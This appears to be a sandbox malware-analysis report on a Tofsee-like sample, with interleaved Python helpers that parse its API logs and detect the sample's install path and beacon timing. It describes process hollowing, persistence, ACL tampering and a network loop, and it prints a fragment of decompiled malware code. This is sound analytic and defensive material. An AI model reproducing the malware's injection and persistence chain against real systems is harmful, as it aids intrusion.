                                                                                 Statement addresses (listing order): 0x00402f2e, 0x00402f34, 0x00402f36, 0x00402f3d, 0x00402f42, 0x00402f4d, 0x00402f88, 0x00402f8b, 0x00402f8e, 0x00402f93, 0x00402f93, 0x00402f96, 0x00402f98, 0x00402f9b, 0x00402f9e, 0x00402f9e, 0x00402fa0, 0x00402fa1, 0x00402fae, 0x00402fb3, 0x00402fb7, 0x00402fbe, 0x00402fc1, 0x00402fc3, 0x00402fc5, 0x00402fca, 0x00402fcd, 0x00000000, 0x00000000, 0x00000000, 0x00402fcd, 0x00402fdb, 0x00402fe3, 0x00402fe8, 0x004030ad, 0x00000000, 0x004030af, 0x00402ff3, 0x00402ff4, 0x00402ff7, 0x00402ff9, 0x00402ffd, 0x00403001, 0x00403017, 0x0040301a, 0x00403021, 0x00403028, 0x0040302b, 0x0040302e, 0x00403031, 0x00403034, 0x00403034, 0x00403036, 0x00403037, 0x00403049, 0x00403051, 0x00403054, 0x00403057, 0x00403059, 0x0040305c, 0x0040305c, 0x0040305e, 0x0040305f, 0x0040306b, 0x00403070, 0x00403076, 0x00403079, 0x0040307c, 0x0040307c, 0x0040307e, 0x0040307f, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00403003, 0x00403003, 0x0040300d, 0x0040300f, 0x0040300f, 0x0040300f, 0x00403012, 0x00403013, 0x00000000, 0x00403083, 0x0040308f, 0x00403094, 0x0040309d, 0x004030a0, 0x004030a3, 0x004030a4, 0x00000000, 0x00402ff7, 0x00402f4f, 0x00402f4f, 0x00402f52, 0x00402f54, 0x00402f54, 0x00402f57, 0x00402f57, 0x00402f59, 0x00402f5a, 0x00402f66, 0x00402f6e, 0x00402f7a, 0x00000000, 0x00402f7a, 0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
                                                                                  • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
                                                                                • HeapFree.KERNEL32(00000000), ref: 00402F7A
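The "APIs" lists above are the report's own per-function call records. As an added example, not part of the report or of the analysed sample, the following Python parses that line format (bullet, optional "Part of subcall function" prefix, API.MODULE(args), "ref:" address), separates recovered strings such as "ntdll.dll" and "_alldiv" from raw 32-bit values, and flags a function whose own calls pair LoadLibrary*/GetModuleHandle* with GetProcAddress, the lazy-import pattern of E0040EAE4 above. The sample text is the two APIs blocks from this section; the function names and the `ApiCall` type are hypothetical helpers.

```python
"""Parse the "APIs" lines of a Joe Sandbox function listing and flag dynamic
API resolution (LoadLibrary*/GetModuleHandle* paired with GetProcAddress in
the same function). Added example; not the sandbox's or the sample's code."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the two "APIs" blocks from this section, in the
# report's own line format ("Part of subcall function" lines are indented).
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(ntdll.dll,0040EB54,_alldiv,0040F0B7,80000001,00000000,00989680,00000000,?,?,?,0040E342,00000000,76A1F210,80000001,00000000), ref: 0040EAF2
• GetProcAddress.KERNEL32(?,00000000), ref: 0040EB07
APIs
  • Part of subcall function 00402D21: GetModuleHandleA.KERNEL32(00000000,74D0EA30,?,00000000,00402F01,?,004020FF,00412000), ref: 00402D3A
  • Part of subcall function 00402D21: LoadLibraryA.KERNEL32(?), ref: 00402D4A
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402F73
• HeapFree.KERNEL32(00000000), ref: 00402F7A
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_WORD = re.compile(r"^[0-9A-Fa-f]{8}$")  # a raw 32-bit stack/argument value


@dataclass
class ApiCall:
    name: str                      # e.g. "LoadLibraryA"
    module: str                    # e.g. "KERNEL32"
    args: List[str]                # argument column as listed; "?" = unresolved
    ref: int                       # address of the call site
    subcall: Optional[int] = None  # set when the call lives in a callee


def parse_api_blocks(text: str) -> List[List[ApiCall]]:
    """Split the text into function entries, one per "APIs" header."""
    groups: List[List[ApiCall]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            groups.append([])
            continue
        m = API_LINE.match(line)
        if not m:
            continue  # metadata lines (Memory Dump Source, hashes, ...) are skipped
        if not groups:
            groups.append([])
        sub = m.group("sub")
        raw_args = m.group("args")
        groups[-1].append(ApiCall(
            name=m.group("name"),
            module=m.group("module"),
            args=[a.strip() for a in raw_args.split(",")] if raw_args else [],
            ref=int(m.group("ref"), 16),
            subcall=int(sub, 16) if sub else None,
        ))
    return groups


def literal_args(call: ApiCall) -> List[str]:
    """Arguments that are neither '?' nor a bare 8-digit hex value, i.e. the
    strings the sandbox recovered from the stack (library and symbol names)."""
    return [a for a in call.args if a != "?" and not HEX_WORD.match(a)]


def has_dynamic_resolution(group: List[ApiCall]) -> bool:
    """True when the function itself (subcall entries excluded) obtains a
    module handle and also calls GetProcAddress."""
    own = {c.name for c in group if c.subcall is None}
    loads = any(n.startswith(("LoadLibrary", "GetModuleHandle")) for n in own)
    return loads and "GetProcAddress" in own


if __name__ == "__main__":
    for i, group in enumerate(parse_api_blocks(SAMPLE)):
        flag = " dynamic-resolution" if has_dynamic_resolution(group) else ""
        print(f"entry {i}: {[c.name for c in group]}{flag}")
        for c in group:
            if literal_args(c):
                print(f"  {c.name} @ {c.ref:08x} literal args: {literal_args(c)}")
```

Subcall entries are kept but excluded from the flag on purpose: the GetModuleHandleA/LoadLibraryA calls under E00402F22 belong to E00402D21, so attributing the pattern to the caller would produce a false positive for every function that merely calls a resolver.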
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                • Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 02082F88: GetModuleHandleA.KERNEL32(?), ref: 02082FA1
                                                                                  • Part of subcall function 02082F88: LoadLibraryA.KERNEL32(?), ref: 02082FB1
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 020831DA
                                                                                • HeapFree.KERNEL32(00000000), ref: 020831E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                • String ID:
                                                                                • API String ID: 1017166417-0
                                                                                • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                • Instruction ID: 9af67915a81f682cb6152b7de1d3b9b56323341f0991eaeefa239b0316db8274
                                                                                • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                • Instruction Fuzzy Hash: 48519A3190034AAFCF02AF64D888AFAB7B5FF55705F1441A9EC96C7210E7329A19DB90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage: 2.7%
                                                                                Dynamic/Decrypted Code Coverage: 22.1%
                                                                                Signature Coverage: 0%
                                                                                Total number of Nodes: 1034
                                                                                Total number of Limit Nodes: 12
                                                                                execution_graph (node/edge listing of the rendered graph; the listing is truncated at the end of the page and is not reproduced here). Call chains recoverable from the listing, keyed by function or basic-block start address:

                                                                                • 409961 (service entry): RegisterServiceCtrlHandlerA, SetServiceStatus (409892), then 4098f2: Sleep loop, CreateEventA (404280, which opens a handle with CreateFileA retried after GetLastError/Sleep and performs overlapped WriteFile/ReadFile with WaitForSingleObject/GetOverlappedResult), then 40977c: CreateProcessA (409794) → GetThreadContext (4097d4) → 40637c (GetModuleHandleA, VirtualAlloc, VirtualAllocEx, WriteProcessMemory) → WriteProcessMemory (40981e) → SetThreadContext (40983b) → ResumeThread (409858); TerminateProcess (4097f6) if any step fails.
                                                                                • 409a6b (entry): SetErrorMode ×2, SetUnhandledExceptionFilter; 40ec54 (GetSystemTimeAsFileTime, GetVolumeInformationA, GetTickCount); GetModuleHandleA, GetModuleFileNameA (409aa3); GetCommandLineA (409afd). Branch (a): GetModuleHandleA, GetModuleFileNameA (40a167) → GetDriveTypeA (40a1b2) → 409145: GetModuleHandleA, GetModuleFileNameA, CharToOemA, wsprintfA, then 409064 writes a file under GetTempPathA (wsprintfA, CreateFileA, lstrlenA, WriteFile, CloseHandle) and launches it with ShellExecuteA (4091d5) → ExitProcess (409c05). Branch (b): DeleteFileA (40a406) retried via GetLastError/Sleep (40a3ed/40a3f8), then CreateThread, WSAStartup (40a41c) → 40e52e (config load) → 401d96 (host survey) → 4080c9 → 40a491: GetTickCount/Sleep loop around 40c913.
                                                                                • 409ca0: GetTempPathA → 4099d2 (lstrcpyA, lstrcatA ×2) → 406a60 (CreateFileA, GetDiskFreeSpaceA, WriteFile at 406987, CloseHandle; GetLastError, CloseHandle, DeleteFileA on failure) → 409d72 (lstrcpyA, lstrcatA ×2) → 409326: GetVersionExA (401924), GetModuleHandleA/GetModuleFileNameA (40934a), wsprintfA, 406edd (AllocateAndInitializeSid, CheckTokenMembership, FreeSid; GetUserNameW/LookupAccountNameW via 406e36), RegOpenKeyExA, RegQueryValueExA ×2, RegCloseKey (4094e8..40956e), 401820 → 401000 (LoadLibraryA followed by a chain of GetProcAddress calls, 4010b5 through 40125c) and GetCurrentProcess, 4091eb (ShellExecuteA with Sleep retry), 40f0e4 (lstrlenA, SysAllocStringByteLen, MultiByteToWideChar) → 4018e0 → 401280: ShellExecuteExW, lstrlenW, GetStartupInfoW, CreateProcessWithLogonW, WaitForSingleObject, CloseHandle, GetLastError.
                                                                                • 409e6b: GetEnvironmentVariableA → 4099d2 → 409eb0 (lstrcpyA, lstrlenA) → 409f32: RegOpenKeyExA → RegSetValueExA, RegCloseKey (409f48) → 409f9d (GetModuleHandleA, GetModuleFileNameA) → GetDriveTypeA (409ff1) → lstrcatA ×n (40a02d..40a081) / wsprintfA (40a0a4), lstrcatA (402554, 40a0ec) → CreateProcessA (40a103) → DeleteFileA (40a12a) → 4096ff: RegOpenKeyExA → RegDeleteValueA, RegCloseKey (40974f). Also GetFileAttributesExA (409dde) → DeleteFileA (409e0c), and StartServiceCtrlDispatcherA (40a39d) → 4098f2.
                                                                                • 401d96 (host survey): GetVersionExA, GetSystemInfo, GetModuleHandleA, GetProcAddress, GetCurrentProcess; 40199c: inet_addr, LoadLibraryA, GetProcAddress ×3, GetProcessHeap, HeapAlloc, HeapReAlloc, HeapFree, FreeLibrary; 401ac3: LoadLibraryA, GetProcAddress; GetComputerNameA, GetVolumeInformationA (401c0d/401c45, 401b68); 4030b5: gethostname, gethostbyname; GetTickCount (401f8e).
                                                                                • 40e52e (config load): 40dd05 (GetTickCount, InterlockedExchange, GetCurrentThreadId, Sleep), 40dbcf → 40db67 (GetEnvironmentVariableA, lstrcpyA, CreateFileA, tried up to four times), GetFileSize (40e555), 40db2e (GetProcessHeap, HeapReAlloc), ReadFile (40e576), 40e332 (SystemTimeToFileTime, GetSystemTimeAsFileTime; lstrcmpiA/lstrcmpA parsing at 40dd84/40ddcf/40de24), CloseHandle (40e5b1); fallback 40e3ca: RegOpenKeyExA, RegQueryValueExA ×3, RegCloseKey.
                                                                                • 4073ff / 40704c (registry walk): RegOpenKeyExA, RegEnumKeyA / RegEnumValueA, RegQueryValueExA, ___ascii_stricmp, lstrlenA (40f1a5), GetFileAttributesExA on the values found, RegCloseKey.
                                                                                • 4080c9 → 407ee6 → 407809 (file ACL rewrite): GetUserNameA, LookupAccountNameA, GetLengthSid, GetFileSecurityA, GetSecurityDescriptorOwner, EqualSid, LocalAlloc, InitializeSecurityDescriptor, SetSecurityDescriptorOwner, SetFileSecurityA; GetSecurityDescriptorDacl, GetAce, EqualSid, DeleteAce, SetSecurityDescriptorDacl, SetFileSecurityA, LocalFree. 407a95 (registry key ACL): RegOpenKeyExA, GetUserNameA, LookupAccountNameA, RegGetKeySecurity, GetSecurityDescriptorOwner, EqualSid, LocalAlloc, InitializeSecurityDescriptor, GetSecurityDescriptorDacl, RegCloseKey (listing cut off after 407b96). 4080c9 also reads RegOpenKeyExA/RegQueryValueExA (408156..40820d), reads a file via 40675c (SetFileAttributesA, CreateFileA, GetFileSize, ReadFile, SetFilePointer, CloseHandle) and starts a thread (408269) → 405e6c → 40e654 / 40c125 → Sleep (408dec).
                                                                                • 40c913 (loop body): socket I/O (send at 40c65c with GetProcessHeap/HeapSize/HeapAlloc; closesocket at 40ca4b, 40cb60, 40dad2; closesocket + Sleep at 40d569 → 40e318); ExitProcess (40d582); file drops built from GetTempPathA (40cc1c), GetSystemDirectoryA (40cfe3, 40d027), GetEnvironmentVariableA (40cfad, 40d22d, 40d36e) and lstrcatA, written with CreateFileA, WriteFile, CloseHandle (40cc9f/40ccc6, 40d15b/40d182, 40d2b1/40d2d8, 40d3f2/40d415) and SetFileAttributesA (40d149, 40d1bf, 40d29f, 40d31d, 40d3e0, 40d452); wsprintfA (40cd16, 40d815); CreateProcessA (40d4b1) with CloseHandle ×2; WaitForSingleObject, CloseHandle ×2 (40cd81) → DeleteFileA (40cdbd); 408e26: GetSystemTime, SystemTimeToFileTime, CreateFileW, DeviceIoControl, CloseHandle; 406f5f: GetUserNameA.
SetSecurityDescriptorOwner 15427->15430 15428 407bf8 GetAce 15428->15433 15429->15424 15430->15429 15431 407ba6 RegSetKeySecurity 15430->15431 15431->15429 15432 407c1d EqualSid 15432->15433 15433->15425 15433->15428 15433->15432 15434 407cd9 15433->15434 15435 407c5f EqualSid 15433->15435 15436 407c3a DeleteAce 15433->15436 15434->15425 15437 407d5a LocalAlloc 15434->15437 15439 407cf2 RegOpenKeyExA 15434->15439 15435->15433 15436->15433 15437->15425 15438 407d70 InitializeSecurityDescriptor 15437->15438 15440 407d7c SetSecurityDescriptorDacl 15438->15440 15441 407d9f LocalFree 15438->15441 15439->15437 15444 407d0f 15439->15444 15440->15441 15442 407d8c RegSetKeySecurity 15440->15442 15441->15425 15442->15441 15443 407d9c 15442->15443 15443->15441 15445 407d43 RegSetValueExA 15444->15445 15445->15437 15446 407d54 15445->15446 15446->15437 15447->14949 15449 40dd05 6 API calls 15448->15449 15452 40e65f 15449->15452 15450 40e6a5 15451 40ebcc 4 API calls 15450->15451 15456 40e6f5 15450->15456 15454 40e6b0 15451->15454 15452->15450 15453 40e68c lstrcmpA 15452->15453 15453->15452 15455 40e6e0 lstrcpynA 15454->15455 15454->15456 15458 40e6b7 15454->15458 15455->15456 15457 40e71d lstrcmpA 15456->15457 15456->15458 15457->15456 15458->14951 15459->14957 15461 40c525 15460->15461 15462 40c532 15460->15462 15461->15462 15464 40ec2e codecvt 4 API calls 15461->15464 15463 40c548 15462->15463 15612 40e7ff 15462->15612 15466 40e7ff lstrcmpiA 15463->15466 15474 40c54f 15463->15474 15464->15462 15467 40c615 15466->15467 15470 40ebcc 4 API calls 15467->15470 15467->15474 15468 40c5d1 15472 40ebcc 4 API calls 15468->15472 15470->15474 15471 40e819 11 API calls 15473 40c5b7 15471->15473 15472->15474 15475 40f04e 4 API calls 15473->15475 15474->14970 15476 40c5bf 15475->15476 15476->15463 15476->15468 15478 402692 inet_addr 15477->15478 15479 40268e 15477->15479 15478->15479 15480 40269e gethostbyname 15478->15480 15481 40f428 15479->15481 15480->15479 15615 40f315 15481->15615 
15485 40c8d2 15484->15485 15486 40c907 15485->15486 15487 40c517 23 API calls 15485->15487 15486->14972 15487->15486 15488 40f43e 15489 40f473 recv 15488->15489 15490 40f47c 15489->15490 15491 40f458 15489->15491 15490->14988 15491->15489 15491->15490 15493 40c670 15492->15493 15494 40c67d 15492->15494 15495 40ebcc 4 API calls 15493->15495 15496 40ebcc 4 API calls 15494->15496 15498 40c699 15494->15498 15495->15494 15496->15498 15497 40c6f3 15497->15001 15497->15042 15498->15497 15499 40c73c send 15498->15499 15499->15497 15501 40c770 15500->15501 15502 40c77d 15500->15502 15503 40ebcc 4 API calls 15501->15503 15504 40ebcc 4 API calls 15502->15504 15506 40c799 15502->15506 15503->15502 15504->15506 15505 40c7b5 15508 40f43e recv 15505->15508 15506->15505 15507 40ebcc 4 API calls 15506->15507 15507->15505 15509 40c7cb 15508->15509 15510 40f43e recv 15509->15510 15511 40c7d3 15509->15511 15510->15511 15511->15042 15628 407db7 15512->15628 15515 407e70 15517 407e96 15515->15517 15519 40f04e 4 API calls 15515->15519 15516 40f04e 4 API calls 15518 407e4c 15516->15518 15517->15042 15518->15515 15520 40f04e 4 API calls 15518->15520 15519->15517 15520->15515 15522 406ec3 2 API calls 15521->15522 15523 407fdd 15522->15523 15524 4073ff 17 API calls 15523->15524 15533 4080c2 CreateProcessA 15523->15533 15525 407fff 15524->15525 15526 407809 21 API calls 15525->15526 15525->15533 15527 40804d 15526->15527 15528 40ef1e lstrlenA 15527->15528 15527->15533 15529 40809e 15528->15529 15530 40ef1e lstrlenA 15529->15530 15531 4080af 15530->15531 15532 407a95 24 API calls 15531->15532 15532->15533 15533->15054 15533->15055 15535 407db7 2 API calls 15534->15535 15536 407eb8 15535->15536 15537 40f04e 4 API calls 15536->15537 15538 407ece DeleteFileA 15537->15538 15538->15042 15540 40dd05 6 API calls 15539->15540 15541 40e31d 15540->15541 15632 40e177 15541->15632 15543 40e326 15543->15025 15545 4031f3 15544->15545 15546 4031ec 15544->15546 15547 40ebcc 4 API calls 15545->15547 
15546->15042 15560 4031fc 15547->15560 15548 403459 15551 40f04e 4 API calls 15548->15551 15549 40349d 15550 40ec2e codecvt 4 API calls 15549->15550 15550->15546 15552 40345f 15551->15552 15553 4030fa 4 API calls 15552->15553 15553->15546 15554 40ebcc GetProcessHeap HeapSize GetProcessHeap HeapAlloc 15554->15560 15555 40344d 15556 40ec2e codecvt 4 API calls 15555->15556 15557 40344b 15556->15557 15557->15548 15557->15549 15559 403141 lstrcmpiA 15559->15560 15560->15546 15560->15554 15560->15555 15560->15557 15560->15559 15658 4030fa GetTickCount 15560->15658 15562 4030fa 4 API calls 15561->15562 15563 403c1a 15562->15563 15564 403ce6 15563->15564 15663 403a72 15563->15663 15564->15042 15567 403a72 9 API calls 15569 403c5e 15567->15569 15568 403a72 9 API calls 15568->15569 15569->15564 15569->15568 15570 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15569->15570 15570->15569 15572 403a10 15571->15572 15573 4030fa 4 API calls 15572->15573 15574 403a1a 15573->15574 15574->15042 15576 40dd05 6 API calls 15575->15576 15577 40e7be 15576->15577 15577->15042 15579 40c105 15578->15579 15580 40c07e wsprintfA 15578->15580 15579->15042 15672 40bfce GetTickCount wsprintfA 15580->15672 15582 40c0ef 15673 40bfce GetTickCount wsprintfA 15582->15673 15585 407047 15584->15585 15586 406f88 LookupAccountNameA 15584->15586 15585->15042 15588 407025 15586->15588 15589 406fcb 15586->15589 15590 406edd 5 API calls 15588->15590 15591 406fdb ConvertSidToStringSidA 15589->15591 15592 40702a wsprintfA 15590->15592 15591->15588 15593 406ff1 15591->15593 15592->15585 15594 407013 LocalFree 15593->15594 15594->15588 15596 40dd05 6 API calls 15595->15596 15597 40e85c 15596->15597 15598 40dd84 lstrcmpiA 15597->15598 15599 40e867 15598->15599 15600 40e885 lstrcpyA 15599->15600 15674 4024a5 15599->15674 15677 40dd69 15600->15677 15606 407db7 2 API calls 15605->15606 15607 407de1 15606->15607 15608 407e16 15607->15608 15609 40f04e 4 API calls 15607->15609 15608->15042 15610 407df2 
15609->15610 15610->15608 15611 40f04e 4 API calls 15610->15611 15611->15608 15613 40dd84 lstrcmpiA 15612->15613 15614 40c58e 15613->15614 15614->15463 15614->15468 15614->15471 15616 40ca1d 15615->15616 15617 40f33b 15615->15617 15616->14985 15616->15488 15618 40f347 htons socket 15617->15618 15619 40f382 ioctlsocket 15618->15619 15620 40f374 closesocket 15618->15620 15621 40f3aa connect select 15619->15621 15622 40f39d 15619->15622 15620->15616 15621->15616 15624 40f3f2 __WSAFDIsSet 15621->15624 15623 40f39f closesocket 15622->15623 15623->15616 15624->15623 15625 40f403 ioctlsocket 15624->15625 15627 40f26d setsockopt setsockopt setsockopt setsockopt setsockopt 15625->15627 15627->15616 15629 407dc8 InterlockedExchange 15628->15629 15630 407dc0 Sleep 15629->15630 15631 407dd4 15629->15631 15630->15629 15631->15515 15631->15516 15633 40e184 15632->15633 15634 40e2e4 15633->15634 15635 40e223 15633->15635 15648 40dfe2 15633->15648 15634->15543 15635->15634 15637 40dfe2 8 API calls 15635->15637 15641 40e23c 15637->15641 15638 40e1be 15638->15635 15639 40dbcf 3 API calls 15638->15639 15642 40e1d6 15639->15642 15640 40e21a CloseHandle 15640->15635 15641->15634 15652 40e095 RegCreateKeyExA 15641->15652 15642->15635 15642->15640 15643 40e1f9 WriteFile 15642->15643 15643->15640 15645 40e213 15643->15645 15645->15640 15646 40e2a3 15646->15634 15647 40e095 4 API calls 15646->15647 15647->15634 15649 40dffc 15648->15649 15651 40e024 15648->15651 15650 40db2e 8 API calls 15649->15650 15649->15651 15650->15651 15651->15638 15653 40e172 15652->15653 15656 40e0c0 15652->15656 15653->15646 15654 40e13d 15655 40e14e RegDeleteValueA RegCloseKey 15654->15655 15655->15653 15656->15654 15657 40e115 RegSetValueExA 15656->15657 15657->15654 15657->15656 15659 403122 InterlockedExchange 15658->15659 15660 40312e 15659->15660 15661 40310f GetTickCount 15659->15661 15660->15560 15661->15660 15662 40311a Sleep 15661->15662 15662->15659 15664 40f04e 4 API calls 15663->15664 15667 403a83 
15664->15667 15665 403ac1 15665->15564 15665->15567 15666 403be6 15670 40ec2e codecvt 4 API calls 15666->15670 15667->15665 15669 403bc0 15667->15669 15671 403b66 lstrlenA 15667->15671 15668 40ec2e GetProcessHeap HeapSize GetProcessHeap HeapFree codecvt 15668->15669 15669->15666 15669->15668 15670->15665 15671->15665 15671->15667 15672->15582 15673->15579 15675 402419 4 API calls 15674->15675 15676 4024b6 15675->15676 15676->15600 15678 40dd79 lstrlenA 15677->15678 15678->15042 14594 e30920 TerminateProcess 14595 e30005 14600 e3092b GetPEB 14595->14600 14597 e30030 14602 e3003c 14597->14602 14601 e30972 14600->14601 14601->14597 14603 e30049 14602->14603 14617 e30e0f SetErrorMode SetErrorMode 14603->14617 14608 e30265 14609 e302ce VirtualProtect 14608->14609 14611 e3030b 14609->14611 14610 e30439 VirtualFree 14615 e305f4 LoadLibraryA 14610->14615 14616 e304be 14610->14616 14611->14610 14612 e304e3 LoadLibraryA 14612->14616 14614 e308c7 14615->14614 14616->14612 14616->14615 14618 e30223 14617->14618 14619 e30d90 14618->14619 14620 e30dad 14619->14620 14621 e30dbb GetPEB 14620->14621 14622 e30238 VirtualAlloc 14620->14622 14621->14622 14622->14608
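Added example, not part of the Joe Sandbox report and not code from the sample: a small Python hunting helper built from two indicators visible in this section, the hard-coded install path C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe in the decompiled entry point below (eight lowercase letters for both the directory and the file name) and the main-loop timing (the loop sleeps 0x1a90 ms at a time until 0x109a0 ms have elapsed since the last successful E0040C913 call, and retries a failed call on the next poll). The process events and connection timestamps are constructed, and matching System32 alongside SysWOW64 is an assumption; the report only shows the SysWOW64 path.

```python
"""Hunting helpers built from the Tofsee entry point decompiled in this report.

Constructed example for this page; it is not code from the report, the sandbox
or the malware. Assumptions: process-creation events are Sysmon-like dicts with
"image" and "parent" fields, and outbound-connection times for one process are
given as millisecond timestamps.
"""
import re
from typing import Iterable

# Install path from the decompiled entry point:
#   E0040EF00("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe", &_v672)
# Both the directory and the executable name are eight lowercase letters, so the
# rule matches that shape rather than the single literal path. System32 is
# included as an assumption (the report only shows the SysWOW64 path).
INSTALL_PATH_RE = re.compile(
    r"^[A-Za-z]:\\Windows\\(?:SysWOW64|System32)\\[a-z]{8}\\[a-z]{8}\.exe$"
)

# Main-loop constants from the decompiled code: after a successful call to
# E0040C913 the loop sleeps 0x1a90 ms at a time until 0x109a0 ms have passed,
# then calls again; on failure it retries after the next 0x1a90 ms sleep.
BEACON_INTERVAL_MS = 0x109A0  # 68000 ms, exactly ten poll sleeps
POLL_SLEEP_MS = 0x1A90        # 6800 ms


def is_tofsee_like_install_path(image: str) -> bool:
    """Eight-lowercase-letter directory and executable under the system directory."""
    return INSTALL_PATH_RE.match(image) is not None


def flag_install_events(events: Iterable[dict]) -> list[dict]:
    """Return process-creation events whose image matches the install pattern.

    Each hit carries a reason; a parent outside C:\\Windows (the dropper running
    from a user directory) is recorded because that is how the sample starts its
    copy. In production, allowlist any legitimate eight-letter system
    subdirectories seen in your fleet before alerting on this shape alone.
    """
    hits = []
    for ev in events:
        image = ev.get("image", "")
        if not is_tofsee_like_install_path(image):
            continue
        parent = ev.get("parent", "").lower()
        outside_windows = not parent.startswith("c:\\windows\\")
        hits.append({
            "pid": ev.get("pid"),
            "image": image,
            "reason": "random 8-letter dir/exe under system directory"
                      + (", parent outside C:\\Windows" if outside_windows else ""),
        })
    return hits


def classify_interval(delta_ms: int, slack_ms: int = 2000) -> str:
    """Label one gap between outbound connections against the loop's timing.

    slack_ms absorbs scheduler jitter and the duration of the previous contact,
    since the timestamp is taken after E0040C913 returns.
    """
    if abs(delta_ms - BEACON_INTERVAL_MS) <= slack_ms:
        return "beacon"   # successful contact, next attempt ~68 s later
    if abs(delta_ms - POLL_SLEEP_MS) <= slack_ms:
        return "retry"    # failed contact, retried after one poll sleep
    return "other"


def looks_like_tofsee_cadence(timestamps_ms: list[int], slack_ms: int = 2000) -> bool:
    """True when every gap is a beacon or retry interval and at least one full
    68-second beacon gap is present."""
    if len(timestamps_ms) < 3:
        return False
    labels = [classify_interval(b - a, slack_ms)
              for a, b in zip(timestamps_ms, timestamps_ms[1:])]
    return "other" not in labels and "beacon" in labels


# Constructed sample data (not from the report's own logs).
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe",
     "parent": r"C:\Users\user\Desktop\file.exe"},
    {"pid": 4212, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe"},
    {"pid": 4300, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe"},
]
# Connection times (ms): success, success, failure retried once, success.
SAMPLE_BEACONS = [1_000_000, 1_068_130, 1_136_250, 1_143_070, 1_211_190]

if __name__ == "__main__":
    for hit in flag_install_events(SAMPLE_EVENTS):
        print(hit)
    print("beacon cadence:", looks_like_tofsee_cadence(SAMPLE_BEACONS))
```

The path rule is deliberately case-sensitive on the random components: the sample uses all-lowercase names, and a case-insensitive match would also catch mixed-case system directories such as LogFiles. The cadence check only makes sense on connections from a single process to a single destination; it is a corroborating signal for the install-path hit, not a stand-alone detection.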
C-Code - Quality: 89%
_entry_(CHAR* _a12, void* _a15) {
	char _v8;
	char _v12;
	intOrPtr _v16;
	char _v20;
	void* _v24;
	char _v28;
	char _v32;
	union _GET_FILEEX_INFO_LEVELS _v36;
	CHAR* _v40;
	char _v44;
	char _v48;
	struct _PROCESS_INFORMATION _v64;
	char _v80;
	char _v112;
	char _v371;
	char _v372;
	char _v671;
	char _v672;
	char _v704;
	struct _STARTUPINFOA _v772;
	char _v1271;
	char _v1272;
	char _v1672;
	char _t238;
	long _t239;
	char _t242;
	long _t244;
	CHAR* _t248;
	char _t250;
	intOrPtr _t257;
	char _t267;
	intOrPtr* _t272;
	char _t276;
	char _t279;
	char _t282;
	char _t283;
	void* _t284;
	char _t294;
	CHAR* _t303;
	int _t304;
	char _t309;
	CHAR* _t312;
	char _t318;
	int _t324;
	CHAR* _t325;
	char _t328;
	char* _t331;
	char _t332;
	char _t340;
	char _t344;
	CHAR* _t357;
	CHAR* _t358;
	int _t359;
	int _t373;
	long _t379;
	void* _t383;
	void* _t396;
	void* _t401;
	char _t402;
	char _t403;
	intOrPtr* _t410;
	void* _t411;
	char _t417;
	char _t418;
	void* _t424;
	intOrPtr _t426;
	void* _t428;
	char* _t436;
	intOrPtr _t441;
	CHAR* _t442;
	void* _t450;
	void* _t451;
	char _t459;
	void* _t464;
	void* _t465;
	void* _t467;
	void* _t468;
	void* _t469;
	void* _t470;
	void* _t471;
	void* _t474;
	intOrPtr _t475;

	SetErrorMode(3); // executed
	SetErrorMode(3); // executed
	SetUnhandledExceptionFilter(E00406511); // executed
